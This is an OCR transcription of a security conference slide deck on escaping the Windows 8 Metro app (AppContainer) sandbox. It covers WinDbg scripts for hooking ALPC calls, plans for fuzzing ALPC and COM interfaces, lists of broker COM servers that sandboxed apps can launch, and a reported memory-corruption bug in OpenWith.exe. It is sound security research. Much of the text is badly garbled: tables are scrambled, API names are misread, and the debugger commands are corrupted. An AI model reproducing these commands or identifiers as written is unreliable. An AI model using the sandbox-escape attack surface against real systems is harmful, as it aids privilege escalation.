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• Doing researches on advanced threats. 


Come out with solutions to solve problems. 
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• Exploit techniques 

• Malware detection 

• Mobile security 
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• Advanced Persistent Threat 

• Malicious document 
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• System vulnerability and protection 

• Mobile security 

• Talks and speeches 

• Black Hat USA 2011 

• Hacks in Taiwan Conference 08' 

• Syscan Singapore 10' 
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Windows®8 








Fancy Ul! 


Lots of security 
improvements! 

Very secure! 


Very robust! 
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Agenda 

• The security design of Metro Style Apps 

• Sandbox Bypassing Analysis 

• Problems discovery and the attack vectors 
- ALPC / COM / WinRT / Design Logic 

• Some issues and responses from MSRC 


Conclusion 


New Security Features in Windows 8 

New kernel protection 


IE 10 

- EPMIE 

- /GS, /SAFESEH, 
/DYNAMICBASE, 

- DEP/NX SHEHOP, 

- ASLR 


• UEFI 

• Application 
SmartScreen 

• Exploit mitigation 
improvement 


- HTML5 Sandbox 


• • • 


WINDOWS 8 AND METRO STYLE APP 










Capability Setting 
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The properties of the deployment package for your app are contained in the app manifest file. You can use the 
Manifest Designer to set or modify one or more of the properties. 


Declarations 

Application Ul 

Capabilities: 


■ Documents Library Access 


I I Enterprise Authentication 
I I Home or Work Networking 
I I Internet (Client & Server) 

I I Internet (Client) 

I I Location 
I I Microphone 
I I Music Library 
I I Pictures Library Access 
I I Proximity 
[ | Removable Storage 
I I Shared User-Certificates 
I I Text Messaging 
I I Videos Library Access 
I I Webcam 


Content URIs Packaging 

Capabilities 

Description: 

Enables adding, changing, or deleting files in the documents libi 
types that are defined by the file type association handler declar 
cannot access document libraries on HomeGroup computers. 

More information 
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Capabilities 

• Network 

- Enterprise auth., client, server & client. Intranet, 
Text, Messaging, etc. 

• File System 

- Documents, Pictures, Music, Video, etc. 

• Devices 

- Location (e.g. GPS), Microphone, Proximity (e.g. 
NFC), Removable storage, etc. 

• Things that are specific to an application (local 

storage, settings, etc.) do not require 
capabilities. # 


USA TODAY was installed 


USA TODAY 

Home > News & weather > News Overview Details Reviews 


Write a review 


* USATuQAj 



Description 

The latest news stories, photos, videos, and weather you've come to expect from USA TODAY are now 
available in a beautiful way on Windows 8. Staying informed has never been this quick, easy, or 
enjoyable. 

Features 

Read stories from USA TODAY'S News, Money, Sports, Life, Tech and Travel sections. View large article 

mMesser inH (Kva ms CK)r® r*s*rrr> 
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Graphics & 
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Printing 


Application Model 


Windows Core OS Services 


Source: http://blogs.msdn.com/b/b8/archive/2012/02/09/building-windows-for-the-arm- 
processor-architecture.aspx ^ 







































WinRT APIs 


• Windows Runtime (WinRT API) is the backbone of 
the new Metro-style apps (also known as Immersive) 
in the Windows 8 operating system. 

• It provides a set of API that can be called from .NET 
languages (C#, VB.NET, F#), C++, and HTML/ 
JavaScript. 

• Apps created for WinRT are 

- Safe 

- Secure 

- Sandboxed 


Core System Services Controller View 


WINRT API 
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APP CONTAINER 
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• What is an application sandbox? 

- A sandbox is a mechanism to isolate untrusted processes. 

- Protecting system from exploit attack. 

— All metro style apps run in AppContainer. 

• What does a sandbox contain? 

— Isolated process which runs with very limited rights 

- Broker, a process which could execute specific actions for a 
isolated process 

- An IPC mechanism to allow isolated processes to 
communicate with broker 



AppContainer 
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capabilities 


App Container 


Metro 


Application 



WinRT APIs 


Appx manifest 



JU 


App Container 


Metro 

Application 



WinRT APIs 


Direct API Calls 
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OS Core 
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S-1-15-2-4238777794-2574622755-3451309604-3242812027-3424635963-2206017950-816935883 
S-1 -1 5-2- 550462423-1739240917- 3080957089-1 32361967-1042326411 -2246802949-1096419336 
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Storage 


T>mputer\HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContaii 


Picture Source: http://ameblo.jp/naoshill28/entry-11049964906.html 































































Telemetry 

Feedback 


Windows 8 SDK for 
Metro style apps 


Windows App 
Certification Kit 
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\ 
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App Signatures 


Frictionless 
Install 


Store 
Onboarding 


App Confidence 


\ 



App Container 


Ratings &Reviews 


We agree all of these designs really provide a secure execution 
environment for Metro style apps. 


source: http://blogs.msdn.eom/b/b8/archive/2012/05/17/delivering-reliable-and-trustworthy-metro-style-apps.aspx 


Security design of Metro Style App 

• Executed in an "App Container" 

- Secured through a sandbox 

- Severely limited resources access 

- Limited resource access: need explicit permissions 

- Use a restricted subset of .NET and Win32 APIs 


Distributed only through the Windows Store 


Previous Works on Sandbox Bypassing 

• Exploit kernel or privilege escalation vulnerabilities to 
escape sandbox. 

• File system: looking for accessible folders/files and 
registries, especially some writable locations on the 
disk. And to see what we can do or what we can get 
from these places. 

• Sending message or keyboard events to outside of 
sandbox, it might trigger some privilege actions. 

• Leverage special handles: some available handles 
might be used to communicate with other process or 
resources. 


ATTACK VECTORS 
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AppContainer Sandbox Attack Vectors 


• ALPC 

• COM 

• WinRT 

• Design Logic 


ATTACK ALPC 
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DEBUG OF ALPC COMMUNICATION 


Client address 
space 


Kernel address space Server address 

space 


Connection port 



FIGURE 3-27 Use of ALPC ports 



Source: http://mba.shengwushibie.com/itbook/BookChapter.aspPich28217 
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Marshalling UnMarshalling 


COM 



RuntimeBroker 


Get Request 


COM 


UnMarshalling 


Marshalling 




CHECK Capability 






Open File 


Ref: http://www.quarkslab.com/dl/2012-HITB-WinRT.pdf 
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0: kd> !alpc /Ipp 85c44400 

Ports created by the process 85c44400: 

Port 856bllb0 is not a connection port. 

Ports the process 85c44400 is connected to: 

8491b038 0 -> 83ae22eO( , ApiPort') 0 852bf6cOCcsrss.exe') 

83ad9660 0 -> 83ac4540('lsapolicylookup') 0 83aa0300Clsass.exe') 

8495b458 0 -> 8571fd98( , epmapper') 0 85720c00('svchost.exe') 

86058408 0 -> 85722270( , actkemel') 0 8570ea00('svchost.exe') 

83fcl038 0 -> 857dal50( , ThemeApiPort') 0 857c0a80Csvchost.exe') 

8492ee40 0 -> 85ed35b0( , OLECE394EC247374B3DB80DFB0D7935') 0 
85e4bccOCexplorer.exe') 

85f9f2a8 0 -> 83ac43f0('lsasspirpc') 0 83aa0300Clsass.exe') 

8513e8f8 0 -> 857bdef8('FontCachePort') 0 857b4c00Csvchost.exe') 

86000618 0 -> 85d67188('msctf.serverDefaultl') 0 85d66700Ctaskhost.exe') 

83abd6f0 0 -> 84967c28( , OLE94FA4C860892A252B3E8A6020AC3') 1 
84b0f380( , RuntimeBroker.') 




ALPC syscall 

82027fl8 823ee774 ntlNtAIpcSetlnformation 
82027flc 8247ba70 ntINtAIpcSendWaitReceivePort 
82027f20 824904ce ntlNtAIpcRevokeSecurityContext 
82027f24 8248a704 ntlNtAIpcQuerylnformationMessage 
82027f28 823fdd80 ntlNtAIpcQuerylnformation 
82027f2c 82408280 ntINtAIpcOpenSenderThread 
82027f30 823fdfdc ntlNtAIpcOpenSenderProcess 
82027f34 824916d0 nt!NtAlpclmpersonateClientOfPort 
82027f38 824b2f06 ntlNtAIpcDisconnectPort 
82027f3c 82490b26 ntINtAIpcDeleteSecurityContext 
82027f40 824cdcd4 ntlNtAIpcDeleteSectionView 
82027f44 824dc258 ntINtAIpcDeleteResourceReserve 
82027f48 824cd3e8 ntlNtAIpcDeletePortSection 
82027f4c 82490034 ntINtAIpcCreateSecurityContext 
82027f50 824cd72a ntINtAIpcCreateSectionView 
82027f54 824dc024 ntINtAIpcCreateResourceReserve 
82027f58 824ccf96 ntINtAIpcCreatePortSection 
82027f5c 824defc4 ntlNtAIpcCreatePort 
82027f60 824e9ae4 ntINtAIpcConnectPort 
82027f64 824e9aa0 ntlNtAIpcConnectPortEx 
82027f68 8247bca0 ntlNtAIpcCancelMessage 
82027f6c 824f78de ntINtAIpcAcceptConnectPort 
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82027flc 8247ba70 ntlNtAIpcSendWaitReceivePort 
82027f5c 824defc4 ntINtAIpcCreatePort 
82027f60 824e9ae4 ntINtAIpcConnectPort 
82027f6c 824f78de ntlNtAIpcAcceptConnectPort 



APLC Communication 
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bp ntdlllNtAIpcSendWaitReceivePort M .catch{r @$tlO = 

0xe4c;.if(@$teb != 0){.if(poi(@$teb+20) = @$tlO){!handle 
poi(esp+0x4);.process; .printf \"PID:%x PortHandle:%x Flags:%x 
SendMessage:%x SendMessageAttributes:%x ReceiveMessage:%x 
BufferLength:%x ReceiveMessageAttributes:%x 
Timeout:%x\r\n\",poi((a)$teb+20) / poi(esp+0x4),poi(esp+0x8),poi(esp+ 
0xc),poi(esp+0xl0),poi(esp+0xl4),poi(esp+0xl8),poi(esp+0xlc),poi(esp 
+0x20);. if(poi(esp+c)!=0){. printf \"send:\";dt _PORT_MESSAGE 
poi(esp+c);db poi(esp+c) I 

(poi(poi(esp+c))&0xffff)+0xl8;gc;};.if(poi(esp+0xl4)!=0){r @$t0 = 
poi(esp+0xl4);.printf \"recv:\";bp poi(esp) \".process;.if(poi(@$teb+20) 
= @$tl0){r @$tl = (poi(@$tO)&Oxffff)+Oxl8;dt_PORT_MESSAGE 
@$t0;!alpc/Ipp;lalpc /m poi(@$t0+0xl0);db @$t0 I @$tl;bc 
2;gc;}.else{gc;}\";gc;}}.else {gc;}}.else {gc;}}" 



HOOK ALPC communication (1) 
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bp ntINtAIpcCreatePort ".process; .printf \"PID:%x PortHandle:%x ObjectAttributes:%x 
MaxConnectionlnfoLength:%x MaxMessageLength:%x MaxPoolUsage:%x 
\r\n\",poi(@$teb+20),poi(esp+0x4) / poi(esp+0x8),poi(esp+0xc) / poi(esp+0xl0) / poi(esp+ 
0x14);" 

bp ntINtAIpcConnectPort ".process; .printf \"PortHandle:%x PortName:%msu 
ObjectAttributes:%x PortAttributes:%x Flags:%x RequiredServerSid:%x 
ConnectionMessage:%x BufferLength:%x OutMessageAttributes:%x 
lnMessageAttributes:%x Timeout:%x 

\r\n\",poi(esp+0x4),poi(esp+0x8) / poi(esp+0xc),poi(esp+0xl0),poi(esp+0xl4),poi(esp+0 
xl8),poi(esp+0xlc),poi(esp+0x20),poi(esp+0x24),poi(esp+0x28),poi(esp+0x2c) " 

bp ntINtAIpcAcceptConnectPort ".process; .printf \"PortHandle:%x 
ConnectionPortHandle:%x Flags:%x ObjectAttributes:%x PortAttributes:%x 
PortContext:%x ConnectionRequest:%x ConnectionMessageAttributes:%x 
AcceptConnection:%x 

\r\n\",poi(esp+0x4),poi(esp+0x8),poi(esp+0xc),poi(esp+0xl0),poi(esp+0xl4),poi(esp+0 
xl8),poi(esp+0xlc),poi(esp+0x20),poi(esp+0x24); “ 



HOOK ALPC communication (2) 


.logopen "metroapp.txt" 


\Z 


Hook nt!NtAlpcCreatePort 




Open Metro App 


\7 


Hook 

ntdINNtAIpcSendWaitReceivePort 
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ncalrpc:[\\Sessions\\l\\AppContainerNamedObjects\\S-l-15-2- 

1115239912-5888679-3094415206-3103815194-10819155- 

2778485781-2267460753\\RPC 

Control\\OLE9517A3676FBEC77BBFB0BB30B841] 
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• {BE0DA0AD-C47E-56DA-BF00-F4344E2FCE93} 
App.wwa 



Implicit process is now 85208a00 

PID::7ec PortHandl e: 168 Flags: 20000 SendMessage: bfb688 SendMessageAttri butes : c0a5cc Recei veMessage: 
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Fuzzing ALPC communication 
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• Inline ASM 

• Hook ntdlllNtAIpcSendWaitReceivePort 

• Modify Send Fuzzzing Data 































ATTACK COM SERVER 





Windows 8 COM 


MICRO 


• lnlnitOrder.blink-kernelbase.dll (insteadofkemei32.dll) 

• OLE32.dll(Win2000->Win7) 

• ComBase.dll (Windows 8) 


■(Functions) 

Dword 

(Word 

| Dword 

1 szAnsi 

000011D 

000BB0E0 

one 

000EE74D 

RoOriginateError 

nnnm 1 c 

nnnDDHDC 

min 

nnncc“7cc 

DrtOri i rs ->*flCrrAr\',/ 


0040102DI 

. 8D45 FC 
. 50 

. 63 F0604000 
. 6fl 04 
. 6fl 00 
. 63 C0604000 

LEA EAX,DWORD PTR S3:CEBP-4] 

PUSH EAX 

PUSH con_test-004060F0 

PUSH 4 

PUSH 0 

PUSH con_test-004060C0 


00401030 

00401031 

00401036 

00401033 

0040103A 

0040103F 

. FF15 B4604000 

CALLED 1 iJ0F:D _ PT R ^D3: [■O^oJ.eSS. CoCreat e I n st an ce > ] 

conbase- CoCreateInstance 


0000122 

000BB085 

0121 

0000123 

000BB7FD 

0122 

0000124 

00032F5D 

0123 

0000125 

000BAC12 

0124 

0000126 

000BB247 

0125 

0000127 

000BB11D 

0126 

0000128 

00032B9C 

0127 



0128 



000EE7D6 


000EE7F5 


000EE81B 


000EE837 


000EE850 


000EE861 


000EE873 


-Q00EE882 


RoReportCapabilityCheckFailure 
RoResoIveRestrictedErrorlnfoReference 
RoRevokeActivationFactories 
RoSetErrorReportingFlags 
RoTransformError 
RoTransformErrorW 
RoUninitialize 
. RoUnreqisterForApartmer 
















Purpose of COM Testing 

• Test stability of COM server 

- Looking for memory problem 


Test functionality of COM server 

- There might be some useful functions can help us 
to do privileged operations. 


The Target - RuntimeBroker 


AppContainer 



r - 

Metro Style 
Apps 
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WinRT 






COM 


RuntimeBroker 
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The Target - Other Possibility M1 c R 0 


AppContainer 



RuntimeBroker 

I I 






























The Target - Privilege 


0 |T3svchost.exe 

m 

[Ij] das Host .exe 

2330 

0WUDFHo3t.exe 

m 

gTabTip.exe 

1140 




a.74 


40,632 K 
6.236 K 
1,424 K 
5,263 K 



TREND 

MICRO" 


43,516 K Host Process for Windows S ... Microsoft Corporation System 

17.S6S K Device Association Frame wo... Microsoft Corporation System 

4,034 K Windows Driver Foundation -... Microsoft Corporation System 

23,520 K Touch Keyboard and Handw... Microsoft Corporation High 





Examples: 


Metro APP COM interface 
RuntimeBroker.exe ->Medium 
lmeBroker.exe ->Medium 
Wkspbroker.exe->Medium 
Tabtip.exe -> High 



TREND 

MICRO" 


Broker 

Process 







The Target - Available COM 



TREND 

MICRO" 


COMView 


File Edit View Special Help 
CLSID I Text 


RemoteAssistance Class 
RuntimeB roker 


{69127B44-2511-4DF5-BC6A-26178254AA40} 
{DG3B10C5-B B 46-4990-A94F-E 40B 9D 5201 GO} 
{E1B A41 AD -4A1D -418F-AABA-3D1196B 423D 3} 
{4AAQA5C4-1B9B-4F2E-99D 7-99C6AE C83474} 
{DCC2B046-8FE3-4F80-BE16-BD575E61A718} 
{1E 2D 67D 6-F596-4640-84F6-CE 09D 630E 983} 
{549e57e9-b3G2-49d1 -bG79-bG4d510efe4b} 
{BF8841C8-378A-4CAD -B 4FC-50913GGCB COD} 
{FFB 8G55F-81B 9-4f ce-B 89C-3AGBA7GD13E 7} 
{995C99GE-D918-4a8c-A302-45719A6F4EA7} 
{fb479c02-9ec4-4fed-8599-debe037452cb} 
{c08afd90-f2a1 -11 dl -8455-00a0c91 f3880} 
{9BA05972-FGA8-11CF-A442-00A0C90ABF39} 
{031EE0G0-G7BC-4G0d-8847-E4A7C5E45A27} 
{94E03510-31 B9-47a0-A44E-E932AC8GBB17} 
{FI 425AG7-1545-44A2-AB59-8DF1020452D9} 
{F87B 28F1-DA9A-4F35-8E C0-800E FCF2GB 83} 
{8144B6F5-20A8-444a-B8EE-19DF0BB84BDB} 
{6295DF2D-35EE-11 Dl -8707-00C04FD 93327} 
{B 8558612-D F5E-4F95-B 8 81 -BE 91 OB 327FB 2} 

{1202D B 60-1DAC-42C5-AE D 5-1AB D D 432248E} 
{1A1F4206-0688-4E 7F-BE 03-D 82E C69D F9A5} 
{69F9CB 25-25E 2-4B E1 -AB 8F-07AA7CB 535E 8} 
{8D8B3E30-C451 -421B-8553-D287GAFAG43C} 
{9aa4G008-3ce0-458a-a354-715G10a075e6} 
{C947D50F-378E-4FFG-8335-FCB50305244D} 
{83FE FA40-GFG7-4244-AA04-1E590C1CB1D9} 
{4545dea0-2dfc-490G-a728-Gd98Gba399a9} 

{1GA1 BE 8G-7FGE -4C20-AD 89-4FFC0D B 7A96A} 
{2cG594dc-04ad-490f-a447-dc8e2772e9cb} 
{aacl 009f-ab33-48f9-9a21 -7f5b8842Ga2e} 
{054AAE20-4BEA-4347-8A35-64A533254A9D} 
{Gd8ff8e0-730d-11 d4-bf42-00b0d0118b5G} 
{6d8ff8e8-730d-11 d4-bf42-00b0d0118b56} 

{81CFA1FF-360D -4368-973A-670B 8D 2AA3B 9} 
{cdc32574-7521 -4124-90c3-8d5605a34933} 
{9C38ED61-D565-4728-AEEE-C80952F0ECDE} 
{5f4baad0-4d59-4fcd-b213-783ce7a92f22} 
{CF1BF3BG-7AD 0-4410-99GB-C78EAFCD32G9} 


SDChangeObj Class 

Setting Sync Task 

Settings Search 

ShapeCollector Class 

ShareFlow 

Shell AutoPlay Direct 

Shell Execute Hardware Event Handler 

Shell Hardware Mixed Content Handler 

Shell Hardware Mixed Content Handler Cancelled 

ShellB rowserWindow 

ShellWindows 

Windows Media Player Rich Preview Handler 
Windows Media Player Device Autoplay 
Spell Checking Host Class 
SPPUIObiectlnteractive Class 
StiEventHandler Class 
Sync Center (Private) 

Sync Center (Private) 

Sync Center Client 
Sync Center Control 

Sync Center Isolation Collection (Private) 

Sync Center Schedule Wizard 
Sync Integration Manager 
Synclnfrastructure Class 
T extContributor Class 
Thumbnail Extraction Host Class 
TPM Virtual Smart Card Manager 
TFA/CGateway WMI Provider 
TSRDSettings Class 
UIHost Class 
UPnPContainer 
UPnPContainer64 

User CPL User Manager Out of Proc Helper 
Windows Media Player Burn Audio CD Handler 
Virtual Disk Service Loader 
WIA Event Prompt Class 
Windows Markup File 


I T VP e 1 _ 

Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 
Locals erver32 


|U 


1 Type Value 


1 ProqlD 


C: \Windows\System32\R AS erver. ewe 
C: \Windows\System32\R untimeB roker. ewe 
C: \Windows\System32\sdchange. ewe 
1 'C: \Windows\System32\S ettingSyncH ost. ewe 11 
%SystemR oot%\System32\rundll32. exe shell3... 
"C:\Program Files\Common Files\Microsoft Sh... 
%SystemR oot%\System32\rundll32. exe shell3... 
%SystemR oot%\System32\rundll32. exe %Syst... 
%SystemR oot%\System32\rundll32. exe %Syst... 
%SystemR oot%\System32\rundll32. exe %Syst ... 
%SystemR oot%\System32\rundll32. exe %Syst... 
%SystemR oot%\System32\rundll32. exe shell3... 
%SystemR oot%\System32\rundll32. exe shell3... 
"%ProgramFiles%\Windows Media Player\wmp... 
"%ProgramFiles%\Windows Media Player\wml... 

1 'C: \Windows\System32\M sS pellCheckingH os... 
%SystemR oot%\System32\slui. exe 
C: \Windows\System32\wiaacmgr. exe 
%SystemR oot%\System32\mobsync. exe 
%SystemR oot%\System32\mobsync. exe 
%SystemR oot%\System32\mobsync. exe 
%SystemR oot%\System32\mobsync. exe 
%SystemR oot%\System32\mobsync. exe 
%SystemR oot%\System32\mobsync. exe 
%SystemR oot%\System32\rundll32. exe %Syst ... 
%SystemR oot%\system32\mobsync. exe 
"C:\Program Files\Common Files\Microsoft Sh... 
%SystemR oot%\System32\T humbnailE xtractio... 

1 '%SystemR oot%\System32\T pmVscM grS vr. ex... 
C:\Program FilesWMwareWMware ToolsMPV... 
%SystemR oot%\system32\T S T heme, exe 
1 '%CommonProgramFiles%\nnicrosoft shared\in... 
%SystemR oot%\system32\upnpcont. exe 
%SystemR oot%\system32\upnpcont. exe 
C: \Windows\System32\U serAccountB roker. exe 
"%ProgramFiles%\Windows Media Player\wmp... 
%SystemRoot%\System32\vdsldr.exe 
C: \Windows\System32\wiaacmgr. exe 
C: \Windows\System32\PresentationH ost. exe 


RAS erver. Remote^ 
sdchange.sdchanc 


ShapeCollector. Sh 

Shell.HWEventHai 


WMP.Device.1 

SPPUl.SPPUIObie 


Tablps.TextContrib 


Windows.XamIDoc 















Looking for Local Servers 


TREND 

MICRO" 


El !■! svchost.exe 
IjTdllhost.exe 


632 

3556 


2,660 K 6,SS6 K Host Process for Windows S... Microsoft Corporation System 

1,333 K 3,352 K COM Surrogate Microsoft Corporation System 


0 


|il Runtime Braker.exe 

3363 

360 K 

3,340 K Runtime Broker 

Microsoft Corporation 

Medium 

ffUratCredential U1 Broker.e* 

e 2428 

1,136 K 

3,860 K Credential Manager Ul Host Microsoft Corporation 

Medium 

lilsvchost.exe 

303 3.33 

40,632 K 

43,516 K Host Process for Windows S... 

Microsoft Corporation 

System 

[■ldasHost.exe 

2330 

3,236 K 

17,363 K Device Association Frame wo.. 

. Microsoft Corporation 

System 

[■]]] WUDFHost.exe 

3563 

1,42:4 K 

4,034 K Windows Driver Foundation -.. 

. Microsoft Corporation 

System 

liilTabTip.exe 

1140 0.74 

3,263 K 

23,520 K Touch Keyboard and Handw.. 

. Microsoft Corporation 

High 


rj ... ic . :fi Ht 50 c"^^a 37 ^fl^-ba 47 -M 0 rfdc 433 d) cto nnrnc> 

([' E50C7BBF AA74 A7F-BjM7-B FOEFCFE433D) 


InT^crnenLation 

Active bn 

LaLnch Permissions 

Aroesa PemEsions 

O L'cc derauh launch permissions 
® Us* these launch penmisstott 



User'Croup 



Can Launch 

| AP PLICATION PACKAGE AUTHORITY\ALL APPUCA. 

Yes | 




















Attack COM server in Metro App 


r 


Metro APP 
Inline ASM 




Fuzzing Attack 


CoCreatelnstance 




IID Interface 




) 


Vptr 

I ■ 

w 



VtFuncl 

VtFunc2 

VtFunc3 



COM Server 


Medium or 
High 




































CLSIDs of imebroker 


{69B1A7D7-C09E-40E9-A1DF-688007A2D9E4} //imebroker.exe 
{9A4B1918-0A2F-4422-89DD-35B3F455999C}//imebroker.exe 
{A4FBCBC6-4BE5-4C3D-8AB5-8B873357A23E}//imebroker.exe 
{BA6EE7D8-190D-423A-93CC-1270E6599195}//imebroker.exe 
{C658E5BD-817B-41C8-8FB6-5B2B386A40EA}//imebroker.exe 
{DE50C7BB-FAA7-4A7F-BA47-BF0EFCFE433D}//imebroker.exe 
{DF46CD07-4F86-42F0-8FA9-35C3CE55D77B}//imebroker.exe 



Clsid with "ALL APPLICATION PACKAGE" 
launch permission 

{7FC12E96-4CB7-4ABD-ADAA-EF7845B10629}//Credential UIBroker.exe 
{31337EC7-5767-llCF-BEAB-00AA006C3606}//Auth Host.exe 
{36BBB745-0999-4FD8-A538-4D4D84E4BD09}//CLSID_JITDebuggingHost 
{228826AF-02El-4226-A9E0-99A855E455A6}//lmmersive Shell Broker unknow 
{A47979D2-C419-11D9-A5B4-001185AD2B89}//Network List Manager unknow 
{C4D6E899-E38A-4838-9188-0B98EE3175E6}//ProgrammabilityManager Class unknow 
{D63B10C5-BB46-4990-A94F-E40B9D520160}//RuntimeBroker.exe 
{549E57E9-B362-49Dl-B679-B64D510EFE4B}//ShareFlow 

{7B6EAlD5-03C2-4AE4-B21C-8D0515CC91B7}//Shell Create Object Task Server unknow 
{F1425A67-1545-44A2-AB59-8DF1020452D9}//Spell Checking Host Class 
{D6E88812-F325-4DC1-BBC7-23076618E58D}//TsfManager Class unknow TabTip.exe 
{6B19643A-0CD7-4563-B710-BDC191FCAD3B}//TSFstateManager Class unknow TabTip.exe 
{054AAE20-4BEA-4347-8A35-64A533254A9D}//high UIHost Class TabTip.exe 
{4CE576FA-83DC-4F88-951C-9D0782B4E376}//UIHostNoLaunch Class unknow TabTip.exe 
{2F93C02D-77F9-46B4-95FB-8CBB81EEB62C}//DevicesFlow 

{19C65143-6230-42FA-A58E-7D9FA9BE2EB5}//WorkspaceBroker Class wkspbroker.exe 



Looking for Interfaces of Local Server 



TREND 

MICRO" 


r i ii i -m i ■ 


fll 


Object: UI Host Class 


IID 

| Name 

| Addr Interface | 

Addr VT ablej 

{00000000-0000-0000-C000-000.. 

. IUnknown 

002C03C0 

7753B1F4 

{00000020-0000-0000-C000-000.. 

. IMiJiQI 

002C03C0 

7753B1F4 

{0000013D -0000-0000-C000-00... 

1 Clients ecurity 

002C039C 

7753B258 

{00020400-0000-0000-C000-000.. 

. IDispatch 

0022BE34 

757CC150 

{11C4304D-0FAA-4C31-8BDD-4... 

. IHostWindow2 

0022BBAC 

GF8ED0G8 

{37C394E 7-432B -4834-A2F7-D C.. 

. ITipInvocation 

0022BD14 

GF8ED0B4 

{3S83B 833-216F-4094-AD9A-61... 

ITipProperties 

0022BAD4 

GF8ED018 

{8241D D BA-CFA9-42E 3-9D 7B -4.. 

. ITextCorrectionSite 

0022BEC4 

GF8ED254 

{CC3E 4D 35-23D D -4C46-8E C4-2.. 

. ITipWindow 

0022BA8C 

6F8ED030 













MICRO 


Looking for functions of Local Server 





Object: C LSI DJITOebugging Host 




IID_ _ | M aine 

trrrrrrrc-DDDD-oooo-cooo-ooo i ir known 

HJJ-OOaW-ODDD QQQQ-COCO DOG... iHullilj 


<000031 3D OOOO-OOOOCQOO-DD. IdienlS ecun iy 

f42E F3F23-7777-42E D-B A?4 3-3. IJITDebuggr^ost2 
{S£4B9?F3-eCiA-4|213-e3£F-56... IJlTDebuggr^lostl DO 


Add Inlerl 


Add Viable 


02C23F60 


775361F4 

7753E1F4 


02C23F3C 7753B256 

0030BEA4 6Q5E3A2n 

00306ESC 6FS6DQ30 


outgoing Interlaces 


Vtablle IJITDebuggingH!osf2 n 


Jf7Name 

Offset 

| Vabe 


0 

0 

6D5E2E32 


1 

4 

ED5E2EG2 


2 

a 

6D9E2C06 


3 

12 

77B0741F 



text=00404958 ; const JITDebuggingHost::CHost::'uftable'{for 'lJITDebuggingHost2'} 

text=00484958 ??_7CHost@JITDebuggingHost0@6BIJITDebuggingHost2@@@ dd offset ?QueryInterface@CHost@JITDebuggingHost@@UAGJABU_GUID@@PAPAX@Z 
text = 00404958 ; DATA KREF: -data:JITDebuggingHost::CHost JITDebuggingHost::CHost::s_Instancejo 

text=00404958 ; JITDebuggingHost::CHost::QueryInterface(_GUID const &,uoid * *) 

text = 0040495C dd offset ?AddRef@CHost@JITDebuggingHost@@UAGKXZ ; JITDebuggingHost: :CHost::AddRef(uoid) 

text = 00404960 dd offset ?Release@CHost@JITDebuggingHost@@UAGKXZ ; JITDebuggingHost: :CHost::Release(uoid) 

text:00404964 dd offset ?JITAsLoggedInUser@CHost@JITDebuggingHostB@UAGJUtagCRASHING_PROGRAM_INFO@@@Z ; JITDebuggingHost::CHost 




















COM Interface Method Fuzzing 

































ATTACK WINRT API 


r 


WinRT APIs 


Communication 
& Data 


Graphics & 
Media 






Devices & 
Printing 


Application Model 

















Metro style application APIs 




User Interface 


HTML5/CSS 

XAML 

DirectX 

Controls 

Data Binding 

SVG 

Tiles 

Input 

Accessibility 

Printing 


Devices 



Communications & Data 



Portable Sensors NFC 


Contracts 

Local & Cloud Storage 

Web 

Playback C 

Media 

_ Visual 

apture Rtayfo. £ffects 


Background 

Transfer 

Notifications Streams 

XML Networking 

SMS 


Fundamentals 

Application Services Threading/Timers Memory Management Authentication Cryptography Globalization 








User Interface 



HTML5/C5S 

VMAl 

Ditto* 


Binding 

S.VG 

TH*§ 

input 


PnrJng 



Playback 


Devices 

Por J ,5&:* S^DOfS NFC 



Communications & Data 

Contracts Local & CtaKJ 

Nctifajfrans 


savePicker.pickSaveFileAsync Q.then(function (f i1 e) { 
if (file) { 

var options = new Windows.System.launcherOptions(); 
options.displayApplicationPicker = true; 

Windows.System.Launcher.1aunchFi1eAsync(f i1e, options); 

1 





SMS 


AppfcfiOfi Sflf vkes Thre^in^T^nwi 


Fundamentals 

Man jgwnwne Auimiwiafl 


Crypmg^apl-r/ Gis&aliza-jon 
























Discovered an Issue of a Broker Process 

• OpenWith.exe (memory corruption) 




Pick an app 


Do you want to send more information about the 
problem? 

Additional details about what went wrong can help Microsoft 
create a solution. 


(a) Hide Details 


Send information 


DC 


Cancel 


Files that help describe the problem: 

C:\U sers\U ser\Ap p D ata\Lo c a l\T em pVWERAF E2.tm p . h d m p 

Read our privacy statement online: 
http ://g o. m i c ro soft, c o m/fwl i n k-'?l inkid= 190175 



File Options View Process Find 

dl @1 a an 93 rf *| 


Process Explorer - Sysinternals: www.sysinternals.com [UserPC\User] 

Users Help 


£ 





E 




Process 

PID CPU 

Private Bytes 

Working Set Description 

Company Name 

Integrity 

- 

[r ■ jWWAHost.exe 

1764 Suspended 

159,340 K 

3,164 K Microsoft WWA Host 

Microsoft Corporation 

AppContainer 


[p ' Runtime Bnoker.exe 

2172 

2.652 K 

14,260 K Runtime Broker 

Microsoft Corporation 

Medium 

* 

[i~l wkspbraker.exe 

1352 

1,664 K 

2,392 K Remote App and Desktop Co... 

. Microsoft Corporation 

Medium 


[i~llrneBroker.exe 

1652 

1.730 K 

7,464 K Microsoft IME2012 

Microsoft Corporation 

Medium 


[i~lWmiPrvSE.exe 

1056 

1,932 K 

7,552 K WMI Provider Host 

Microsoft Corporation 

System 


[r [WWAHost.exe 

2143 Suspended 

27,432 K 

55,200 K Microsoft WWA Host 

Microsoft Corporation 

AppContainer 


BfO P e n W it h. ex e 

2264 

1.72SK 

12,444 K Pick an app 

Microsoft Corporation 

Medium 


[i~lWmiPrvSE.exe 

2512 

2,630 K 

9,423 K WMI Provider Host 

Microsoft Corporation 

System 


[i~TnWorker.exe 

692 

2.200 K 

9,300 K Windows Modules Installer ... 

Microsoft Corporation 

System 

- 


Name Description 


Company Name 

Version 



- 

{GAF0698BD55&4 







{AFBF9F1A-3EES4... 







{D D F571F2-B E9B-4. .. 







actxprxy.dll ActiveX Interface Marshaling Ubrary 

Microsoft Corporation 

6.2.3250.0 



' 

advapi32.dll Advanced Windows 32 Base API 

Microsoft Corporation 

6 2 32500 




atl.dll ATL Module for Windows XP (Unicode) 

